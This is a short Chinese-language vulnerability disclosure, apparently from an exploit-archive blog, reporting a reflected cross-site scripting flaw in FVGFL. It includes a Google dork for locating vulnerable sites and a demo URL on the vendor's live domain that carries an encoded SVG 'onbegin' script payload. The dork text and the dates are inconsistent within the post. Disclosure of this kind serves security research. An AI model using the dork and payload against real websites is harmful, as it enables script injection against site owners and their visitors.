FVGFL跨站脚本漏洞(XSS)技术分析与利用详情

本文详细披露了FVGFL系统中存在的一个跨站脚本(XSS)安全漏洞,包括漏洞发现时间、利用方法、Google搜索关键词(Dork)以及概念验证(PoC)的演示链接,适用于安全研究人员进行漏洞复现与防护参考。

FVGFL - 跨站脚本漏洞(XSS)

2025.09.27 作者: Mahdi Karimi

风险等级:

本地利用:

远程利用:

CVE编号: N/A

CWE编号: N/A

搜索关键词: "Powered by Web FVGFL"

#漏洞标题: FVGFL - 跨站脚本漏洞(XSS) #发布日期: 2025-09-18 #漏洞作者: Mahdi Karimi #厂商主页: https://www.fvgfl.com #Google搜索关键词: "Powered by Web FVGFL" #测试环境: Ubuntu 25.04

概念验证: 在Google中搜索关键词:"Powered by Web Partner"

演示: https://www.fvgfl.com/news.php?id=22%27%3E%3Csvg%3E%3Cset+onbegin%3Dalert%281%29+attributeName%3Dx+to%3D0%3E

#发现者: Mahdi Karimi #邮箱: mjoker22mjoker22@gmail.com

comments powered by Disqus
© 2020 - 2026 qife
使用 Hugo 构建
主题 StackJimmy 设计
本站总访问量 本站访客数人次